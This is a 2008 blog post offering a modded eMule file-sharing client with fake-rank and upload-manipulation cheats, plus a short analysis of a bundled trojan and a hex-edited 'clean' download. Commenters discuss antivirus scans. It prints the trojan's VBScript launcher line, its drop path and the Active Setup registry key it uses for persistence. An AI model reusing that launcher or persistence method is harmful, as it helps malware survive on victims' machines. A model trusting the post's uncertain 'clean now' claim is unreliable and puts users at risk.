09 July 2008

eMule 0.48a Final Fight Gold [Clean]

eMule 0.48a Final Fight Gold

eMule v0.48a Final Fight Gold
0.48a eMule Final Fight Gold (5) based on
Sivka 0.48a v18a1-alpha

Modded by Ruffy
15-May-2008

-Fake Rank
-Queue Size Verändert
-Max Queue Rank beim Download erhöht
-Ändern der Upload – Slotanzahl
-Upload wurde manipuliert, (Man kann es auf 1 setzen ohne das sich der Down-Speed ändert) Upload manipulated, it can be set to 1 it will not affect the Down-Speed
-Remove Ratio
-Remove Wizard
-Remove Help
-Added new Icons


Code analyse:
Agent.ECJH
Malware to: Documents and Settings\YourWindowsLogonName\Application Data\Microsoft\spoolsv.exe
and
cfgmgr.vbs
with content:
Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run Chr(34) & "C:\Documents and Settings\Nata...\Application Data\Microsoft\spoolsv.exe" & Chr(34)
was add the registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}

result still not clean but the virus is possible eliminated and can not more start nor produce
http://www.virustotal.com/analisis/dde25155980c21598c035c52581fc250

I found: HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{6778F1EE-80BB-4F27-BC69-F91B843782CD}

Download: IT SHOULD BE CLEAN NOW OR THE TROJAN IS NOW DESTROYED
eMule 0.48a Final Fight Gold -clean.zip
2.72 MB - Hexedited

4 comments:

Anonymous said...

Kaspersky 2009,Spybot,A-Squared
nothing found...
The Reg Key i don't found.
Sorry my english :-((

Recon said...

Don;t know most c++ binaries with coded not attached or things with binder done not shown in the most AV's.
all emules before almost found inside exe with VBA32
http://vba32.de/demo/content/view/15/31/
maybe cause of:
http://en.wikipedia.org/wiki/Vba32_AntiVirus
the advantage of this AV:
- Usage of the “Delta-patch” technology
- Heuristic analyzer and technology of recognition of viruses MalwareScope, considerably improve the efficiency of new malicious programs detection
- Dynamic code translation processor emulator effectively handles complex-polymorphous viruses, packers and cryptors
... and many more

Scan bulk exe done with VC++ with
Virus Block Ada 32
http://vba32.de/anonymous/pub/Vba32Scan.zip

Recon said...

newer version here:
ftp://anti-virus.by/pub/Vba32Scan.zip

scanner only

Anonymous said...

It's really clean now. Tested in sandbox and vp

Post a Comment

We would appreciate if you as readers of our blog, show us some feedback by signing up to this site with Friend Connect.
This will encourage us to publish updates in the future.

Archive

Dentoo.info - Hosting - Offering seedboxes and seedbox solutions

Connect

MoDs - BRD Push 2 Check Projects News all on one Page
Subscribe to rss feed! Powered By Blogger Creative Commons —
 Attribution-Noncommercial-No Derivative Works 1.0 Generic
GFC Accessibly Test

Site Stats Public Google Analytics stats

We respect your privacy. Your email address will never be shared with others.

My IP Address